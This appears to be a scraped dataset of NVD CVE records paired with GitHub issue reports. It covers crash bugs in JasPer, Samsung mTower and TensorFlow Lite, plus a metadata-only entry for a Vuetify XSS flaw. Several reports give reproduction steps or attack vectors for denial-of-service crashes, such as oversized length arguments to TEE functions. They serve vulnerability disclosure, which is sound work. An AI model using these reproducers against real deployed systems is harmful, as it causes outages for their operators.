[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jasper-software/jasper/issues/338" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jasper-software/jasper/issues/338" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jasper_project:jasper:3.0.6:*:*:*:*:*:*:*", "matchCriteriaId": "CD0938AD-12F3-4B02-899A-A54286B9FFEE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "617" ]
617
https://github.com/jasper-software/jasper/issues/338
[ "Exploit", "Third Party Advisory" ]
github.com
[ "jasper-software", "jasper" ]
## summary Hello, I was testing my fuzzer and found a reachable assertion in imginfo. An assertion in function inttobits can be reached when parsing a crafted jp2 file, when running `./imginfo -f $POC`, as shown in the attachment ## Environment * Ubuntu 22.04 (docker) * gcc/g++ 11.2.0 * jasper latest commit 0c2a927c530d18a706ace73536f347354ca3d957 ## Step to reproduce ``` mkdir jasper-build && pushd jasper-build cmake -DJAS_ENABLE_SHARED=NO .. && make -j$(nproc) ./src/app/imginfo -f $POC ``` ## output ``` imginfo: /benchmark/jasper/src/libjasper/base/jas_image.c:1010: inttobits: Assertion `v >= 0 || sgnd' failed. Aborted (core dumped) ``` ## POC [poc0.zip](https://github.com/jasper-software/jasper/files/9554506/poc0.zip) ## Credit Han Zheng (NCNIPC of China, Hexhive) Yin Li, Xiaotong Jiao (NCNIPC of China)
[BUG] Reachable assertion in inttobits, jas_image.c
https://api.github.com/repos/jasper-software/jasper/issues/338/comments
10
2022-09-13T07:26:35Z
2022-11-04T16:13:07Z
https://github.com/jasper-software/jasper/issues/338
1,370,986,252
338
4,160
CVE-2022-40757
2022-09-16T22:15:12.347
A Buffer Access with Incorrect Length Value vulnerablity in the TEE_MACComputeFinal function in Samsung mTower through 0.3.0 allows a trusted application to trigger a Denial of Service (DoS) by invoking the function TEE_MACComputeFinal with an excessive size value of messageLen.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/Samsung/mTower/blob/efd36709306a9afcca5b4782499d01be0c7a02a5/tee/lib/libutee/tee_api_operations.c#L1031" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Samsung/mTower/issues/81" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/Samsung/mTower/blob/efd36709306a9afcca5b4782499d01be0c7a02a5/tee/lib/libutee/tee_api_operations.c#L1031" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Samsung/mTower/issues/81" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:samsung:mtower:*:*:*:*:*:*:*:*", "matchCriteriaId": "8C72C53B-9CF2-4F9A-90C1-3A1FE236BA5B", "versionEndExcluding": null, "versionEndIncluding": "0.3.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "119" ]
119
https://github.com/Samsung/mTower/issues/81
[ "Third Party Advisory" ]
github.com
[ "Samsung", "mTower" ]
Buffer Access with Incorrect Length Value in the function TEE_MACUpdate **Affected components:** affected source code file: /tee/lib/libutee/tee_api_objects.c, affected functions: TEE_MACUpdate **Attack vector(s)** To exploit the vulnerability, invoke the function TEE_MACUpdate and pass an excessive size value of "chunkSize". **Suggested description of the vulnerability for use in the CVE** Buffer Access with Incorrect Length Value vulnerablity in TEE_MACUpdate function in Samsung Electronics mTower v0.3.0 (and earlier) allows a trusted application to trigger a Denial of Service (DoS) via invoking the function TEE_MACUpdate with a excessive size value of "chunkSize". **Discoverer(s)/Credits** SyzTrust **Reference(s)** https://github.com/Samsung/mTower https://github.com/Samsung/mTower/blob/efd36709306a9afcca5b4782499d01be0c7a02a5/tee/lib/libutee/tee_api_operations.c#L1188 https://github.com/Samsung/mTower/blob/efd36709306a9afcca5b4782499d01be0c7a02a5/crypto/libtomcrypt/include/tomcrypt_hash.h#L397 **Additional information** The TEE_MACUpdate function takes an argument "chunkSize". This value is passed by TA, and TEE_MACUpdate does not check whether it is equal to the size of "chunk" or not. With an excessive large value, executing the statement "memcpy(md-> state_var .buf + md-> state_var.curlen, in, (size_t)n);" later may crash the trusted execution environment kernel and cause a Denial of Service (DoS). --- Buffer Access with Incorrect Length Value in the function TEE_MACComputeFinal **Affected components:** affected source code file: /tee/lib/libutee/tee_api_objects.c, affected functions: TEE_MACComputeFinal **Attack vector(s)** To exploit the vulnerability, invoke the function TEE_MACComputeFinal and pass an excessive size value of "messageLen". **Suggested description of the vulnerability for use in the CVE** Buffer Access with Incorrect Length Value vulnerablity in TEE_MACComputeFinal function in Samsung Electronics mTower v0.3.0 (and earlier) allows a trusted application to trigger a Denial of Service (DoS) via invoking the function TEE_MACComputeFinal with a excessive size value of "messageLen". **Discoverer(s)/Credits** SyzTrust **Reference(s)** https://github.com/Samsung/mTower https://github.com/Samsung/mTower/blob/efd36709306a9afcca5b4782499d01be0c7a02a5/tee/lib/libutee/tee_api_operations.c#L1031 **Additional information** The TEE_MACComputeFinal function takes an argument "messageLen". This value is passed by TA, and TEE_MACComputeFinal does not check whether it is the size of "message" or not. With an excessive large value, executing the statement "res = utee_cipher_update(operation->state, srcData, srcLen, destData, &dl);" later will crash the trusted execution environment kernel and cause a Denial of Service (DoS). --- Buffer Access with Incorrect Length Value in the function TEE_CipherUpdate **Affected components:** affected source code file: /tee/lib/libutee/tee_api_objects.c, affected functions: TEE_CipherUpdate **Attack vector(s)** To exploit the vulnerability, invoke the function TEE_CipherUpdate and pass an excessive size value of "srcLen". **Suggested description of the vulnerability for use in the CVE** Buffer Access with Incorrect Length Value vulnerablity in TEE_CipherUpdate function in Samsung Electronics mTower v0.3.0 (and earlier) allows a trusted application to trigger a Denial of Service (DoS) via invoking the function TEE_CipherUpdate with a excessive size value of "srcLen". **Discoverer(s)/Credits** SyzTrust **Reference(s)** https://github.com/Samsung/mTower https://github.com/Samsung/mTower/blob/efd36709306a9afcca5b4782499d01be0c7a02a5/tee/lib/libutee/tee_api_operations.c#L1224 **Additional information** The TEE_CipherUpdate function takes an argument "srcLen". This value is passed by TA, and TEE_CipherUpdate does not check whether it is the size of "srcData" or not. With an excessive large value, executing the statement "res = utee_hash_final(operation->state, message, messageLen, mac, &ml);" later will crash the trusted execution environment kernel and cause a Denial of Service (DoS). *THANK YOU FOR CONTRIBUTIONS IN MTOWER TEE OS!*
Security: Buffer Access with Incorrect Length Value in TEE_MACUpdate, TEE_MACComputeFinal and TEE_CipherUpdate
https://api.github.com/repos/Samsung/mTower/issues/81/comments
0
2022-09-16T14:10:07Z
2022-11-28T10:30:30Z
https://github.com/Samsung/mTower/issues/81
1,376,007,292
81
4,161
CVE-2022-40759
2022-09-16T22:15:12.430
A NULL pointer dereference issue in the TEE_MACCompareFinal function in Samsung mTower through 0.3.0 allows a trusted application to trigger a Denial of Service (DoS) by invoking the function TEE_MACCompareFinal with a NULL pointer for the parameter operation.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/Samsung/mTower/blob/efd36709306a9afcca5b4782499d01be0c7a02a5/tee/lib/libutee/tee_api_operations.c#L1249" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Samsung/mTower/issues/80" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/Samsung/mTower/blob/efd36709306a9afcca5b4782499d01be0c7a02a5/tee/lib/libutee/tee_api_operations.c#L1249" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Samsung/mTower/issues/80" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:samsung:mtower:*:*:*:*:*:*:*:*", "matchCriteriaId": "8C72C53B-9CF2-4F9A-90C1-3A1FE236BA5B", "versionEndExcluding": null, "versionEndIncluding": "0.3.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/Samsung/mTower/issues/80
[ "Third Party Advisory" ]
github.com
[ "Samsung", "mTower" ]
**Affected components:** affected source code file: /tee/lib/libutee/tee_api_objects.c, affected functions: TEE_MACCompareFinal **Attack vector(s)** To exploit the vulnerability, invoke the function TEE_MACCompareFinal and pass a NULL pointer to the parameter "operation". **Suggested description of the vulnerability for use in the CVE** Null pointer dereference vulnerablity in TEE_MACCompareFinal function in Samsung Electronics mTower v0.3.0 (and earlier) allows a trusted application to trigger a Denial of Service (DoS) via invoking the function TEE_MACCompareFinal with a Null pointer of the parameter "operation". **Discoverer(s)/Credits** SyzTrust **Reference(s)** https://github.com/Samsung/mTower https://github.com/Samsung/mTower/blob/efd36709306a9afcca5b4782499d01be0c7a02a5/tee/lib/libutee/tee_api_operations.c#L1249 **Additional information** The TEE_MACCompareFinal function takes a pointer "operation". This value is passed by TA, and TEE_MACCompareFinal does not check whether it is a null pointer or not. Executing the statement "if (operation->info.operationClass != TEE_OPERATION_MAC)" later will crash the trusted execution environment kernel and cause a Denial of Service (DoS). *THANK YOU FOR CONTRIBUTIONS IN MTOWER TEE OS!*
Security: NULL Pointer Dereference in the function TEE_MACCompareFinal
https://api.github.com/repos/Samsung/mTower/issues/80/comments
0
2022-09-16T14:06:28Z
2022-11-21T11:13:40Z
https://github.com/Samsung/mTower/issues/80
1,376,002,655
80
4,162
CVE-2022-40761
2022-09-16T22:15:12.517
The function tee_obj_free in Samsung mTower through 0.3.0 allows a trusted application to trigger a Denial of Service (DoS) by invoking the function TEE_AllocateOperation with a disturbed heap layout, related to utee_cryp_obj_alloc.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/Samsung/mTower/blob/efd36709306a9afcca5b4782499d01be0c7a02a5/tee/tee/tee_obj.c#L109" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/Samsung/mTower/blob/efd36709306a9afcca5b4782499d01be0c7a02a5/tee/tee/tee_svc_cryp.c#L1248" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Samsung/mTower/issues/83" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/Samsung/mTower/blob/efd36709306a9afcca5b4782499d01be0c7a02a5/tee/tee/tee_obj.c#L109" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/Samsung/mTower/blob/efd36709306a9afcca5b4782499d01be0c7a02a5/tee/tee/tee_svc_cryp.c#L1248" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Samsung/mTower/issues/83" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:samsung:mtower:*:*:*:*:*:*:*:*", "matchCriteriaId": "8C72C53B-9CF2-4F9A-90C1-3A1FE236BA5B", "versionEndExcluding": null, "versionEndIncluding": "0.3.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "1284" ]
1284
https://github.com/Samsung/mTower/issues/83
[ "Third Party Advisory" ]
github.com
[ "Samsung", "mTower" ]
**Affected components:** affected source code file: /tee/tee/tee_svc_cryp.c, affected functions: utee_cryp_obj_alloc affected source code file: /tee/tee/tee_obj.c, affected functions: tee_obj_alloc and tee_obj_free **Attack vector(s)** One way to exploit the vulnerability, invoking the function `TEE_AllocateOperation` and `TEE_Realloc` with a large size to disturb the heap layout, and invoke `TEE_AllocateOperation` again. **Suggested description of the vulnerability for use in the CVE** Improper Input Validation vulnerablity in the function `tee_obj_free` in Samsung Electronics mTower v0.3.0 (and earlier) allows a trusted application to trigger a Denial of Service (DoS) via invoking the function `TEE_AllocateOperation` with a disturbed heap layout. **Discoverer(s)/Credits** SyzTrust **Reference(s)** https://github.com/Samsung/mTower https://github.com/Samsung/mTower/blob/efd36709306a9afcca5b4782499d01be0c7a02a5/tee/tee/tee_svc_cryp.c#L1248 https://github.com/Samsung/mTower/blob/efd36709306a9afcca5b4782499d01be0c7a02a5/tee/tee/tee_obj.c#L109 **Additional information** As shown in POC, the `calloc` function in `tee_obj_alloc` does not return a buffer with all bits zero as expected when the heap layout was disturbed in mTower on a real IoT hardware (such as Numaker-PFM-M2351). Executing the statement `free(o->attr)` then will free an invalid pointer, which will crash the trusted execution environment kernel and cause a Denial of Service (DoS). **PoC** [poc_14.zip](https://github.com/Samsung/mTower/files/9584787/poc_14.zip) *THANK YOU FOR CONTRIBUTIONS IN MTOWER TEE OS!*
Security: Improper Input Validation in the function utee_cryp_obj_alloc
https://api.github.com/repos/Samsung/mTower/issues/83/comments
0
2022-09-16T14:14:28Z
2022-11-24T19:39:39Z
https://github.com/Samsung/mTower/issues/83
1,376,012,858
83
4,163
CVE-2022-40762
2022-09-16T22:15:12.557
A Memory Allocation with Excessive Size Value vulnerablity in the TEE_Realloc function in Samsung mTower through 0.3.0 allows a trusted application to trigger a Denial of Service (DoS) by invoking the function TEE_Realloc with an excessive number for the parameter len.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/Samsung/mTower/blob/efd36709306a9afcca5b4782499d01be0c7a02a5/tee/lib/libutee/tee_api.c#L319" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Samsung/mTower/issues/82" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/Samsung/mTower/blob/efd36709306a9afcca5b4782499d01be0c7a02a5/tee/lib/libutee/tee_api.c#L319" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Samsung/mTower/issues/82" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:samsung:mtower:*:*:*:*:*:*:*:*", "matchCriteriaId": "8C72C53B-9CF2-4F9A-90C1-3A1FE236BA5B", "versionEndExcluding": null, "versionEndIncluding": "0.3.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "770" ]
770
https://github.com/Samsung/mTower/issues/82
[ "Third Party Advisory" ]
github.com
[ "Samsung", "mTower" ]
**Affected components:** affected source code file: /tee/lib/libutee/tee_api.c, affected functions: TEE_Realloc **Attack vector(s)** To exploit the vulnerability, invoke the function TEE_Realloc and pass a large number to the parameter "len". **Suggested description of the vulnerability for use in the CVE** Memory Allocation with Excessive Size Value vulnerablity in TEE_Realloc function in Samsung Electronics mTower v0.3.0 (and earlier) allows a trusted application to trigger a Denial of Service (DoS) via invoking the function TEE_Realloc with an excessive number of the parameter "len". **Discoverer(s)/Credits** SyzTrust **Reference(s)** https://github.com/Samsung/mTower https://github.com/Samsung/mTower/blob/efd36709306a9afcca5b4782499d01be0c7a02a5/tee/lib/libutee/tee_api.c#L319 **Additional information** The function TEE_Realloc does not check the size of chunk to realloc. Executing the statement "tee_user_mem_realloc" with an excessive size value on a real IoT hardware (such as Numaker-PFM-M2351) will crash the trusted execution environment kernel and cause a Denial of Service (DoS). *THANK YOU FOR CONTRIBUTIONS IN MTOWER TEE OS!*
Security: Memory Allocation with Excessive Size Value in the function TEE_Realloc
https://api.github.com/repos/Samsung/mTower/issues/82/comments
0
2022-09-16T14:12:09Z
2022-10-25T13:47:21Z
https://github.com/Samsung/mTower/issues/82
1,376,009,885
82
4,164
CVE-2022-36027
2022-09-16T23:15:11.430
TensorFlow is an open source platform for machine learning. When converting transposed convolutions using per-channel weight quantization the converter segfaults and crashes the Python process. We have patched the issue in GitHub commit aa0b852a4588cea4d36b74feb05d93055540b450. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. There are no known workarounds for this issue.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 3.6, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/commit/aa0b852a4588cea4d36b74feb05d93055540b450" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/issues/53767" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-79h2-q768-fpxr" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/commit/aa0b852a4588cea4d36b74feb05d93055540b450" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/issues/53767" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-79h2-q768-fpxr" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*", "matchCriteriaId": "C6622D95-1C86-45C5-AB55-E6EEEA0996DF", "versionEndExcluding": "2.7.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*", "matchCriteriaId": "0F9D273D-02DC-441E-AA91-EAC8DEAA4B44", "versionEndExcluding": "2.8.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.8.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*", "matchCriteriaId": "FE4F8A81-6CC2-4F7F-9602-C170FDD926E7", "versionEndExcluding": "2.9.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.9.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:google:tensorflow:2.10:rc0:*:*:*:*:*:*", "matchCriteriaId": "1DBFBCE2-0A01-4575-BE45-6775ABFB8B28", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:google:tensorflow:2.10:rc1:*:*:*:*:*:*", "matchCriteriaId": "89806CF9-E423-4CA6-A01A-8175C260CB24", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:google:tensorflow:2.10:rc2:*:*:*:*:*:*", "matchCriteriaId": "F2B80690-A257-4E16-BD27-9AE045BC56ED", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:google:tensorflow:2.10:rc3:*:*:*:*:*:*", "matchCriteriaId": "F335F9A4-5AB8-4E53-BC18-E01F7C653E5E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "20" ]
20
https://github.com/tensorflow/tensorflow/issues/53767
[ "Exploit", "Third Party Advisory" ]
github.com
[ "tensorflow", "tensorflow" ]
When converting transposed convolutions using per-channel weight quantization the converter segfaults and crashes the Python process. Per-channel quantization is supported by TFLite Transposed convolutions: https://github.com/tensorflow/tensorflow/blob/f87be6c7de847017c48520649e3d771e5d6b81b6/tensorflow/lite/kernels/transpose_conv.cc#L371-L380 so the converter shouldn't segfault when trying to convert such a model. It looks like this issue has been introduced in TensorFlow 2.6 since the same model code produced a valid TFLite file in TensorFlow 2.5. This issue might also be related to #53766, but in any case the converter should never segfault. ### 1. System information - OS Platform and Distribution (e.g., Linux Ubuntu 16.04): macOS / Ubuntu - TensorFlow installation (pip package or built from source): pip package - TensorFlow library (version, if pip package or github SHA, if built from source): 2.6, 2.7, 2.8rc0 and 2.9.0-dev20220114 ### 2. Code A minimal reproduction of the issue and a workaround is available in [this notebook](https://colab.research.google.com/drive/1IXri5HeDc9qTAtDOp-LqZyQTL8CcemGq?usp=sharing). ```python import tensorflow as tf class QuantConv2DTransposed(tf.keras.layers.Layer): def build(self, input_shape): self.kernel = self.add_weight("kernel", [3, 3, input_shape[-1], 24]) def call(self, inputs): filters = tf.quantization.fake_quant_with_min_max_vars_per_channel( self.kernel, -3.0 * tf.ones([24]), 3.0 * tf.ones([24]), narrow_range=True ) filters = tf.transpose(filters, (0, 1, 3, 2)) return tf.nn.conv2d_transpose(inputs, filters, [*inputs.shape[:-1], 24], 1) inp = tf.keras.Input(shape=(6, 8, 48), batch_size=1) x = tf.quantization.fake_quant_with_min_max_vars(inp, -3.0, 3.0, narrow_range=True) x = QuantConv2DTransposed()(x) x = tf.quantization.fake_quant_with_min_max_vars(x, -3.0, 3.0, narrow_range=True) model = tf.keras.Model(inp, x) model.save("/tmp/testing") converter = tf.lite.TFLiteConverter.from_saved_model("/tmp/testing") converter.optimizations = [tf.lite.Optimize.DEFAULT] # terminated by signal SIGSEGV (Address boundary error) tflite_model = converter.convert() ```
TFLite Converter segfaults when trying to convert per-channel quantized transposed convolutions
https://api.github.com/repos/tensorflow/tensorflow/issues/53767/comments
9
2022-01-14T18:55:01Z
2024-11-01T02:08:27Z
https://github.com/tensorflow/tensorflow/issues/53767
1,104,010,260
53,767
4,165
CVE-2022-25873
2022-09-18T15:15:09.660
The package vuetify from 2.0.0-beta.4 and before 2.6.10 are vulnerable to Cross-site Scripting (XSS) due to improper input sanitization in the 'eventName' function within the VCalendar component.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.6, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.1, "impactScore": 2.5, "source": "report@snyk.io", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.5, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://codepen.io/5v3n-08/pen/MWGKEjY" }, { "source": "report@snyk.io", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/vuetifyjs/vuetify/commit/ade1434927f55a0eccf3d54f900f24c5fa85a176" }, { "source": "report@snyk.io", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/vuetifyjs/vuetify/issues/15757" }, { "source": "report@snyk.io", "tags": [ "Third Party Advisory" ], "url": "https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBVUETIFYJS-3024407" }, { "source": "report@snyk.io", "tags": [ "Third Party Advisory" ], "url": "https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-3024406" }, { "source": "report@snyk.io", "tags": [ "Third Party Advisory" ], "url": "https://security.snyk.io/vuln/SNYK-JS-VUETIFY-3019858" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://codepen.io/5v3n-08/pen/MWGKEjY" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/vuetifyjs/vuetify/commit/ade1434927f55a0eccf3d54f900f24c5fa85a176" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/vuetifyjs/vuetify/issues/15757" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBVUETIFYJS-3024407" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-3024406" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.snyk.io/vuln/SNYK-JS-VUETIFY-3019858" } ]
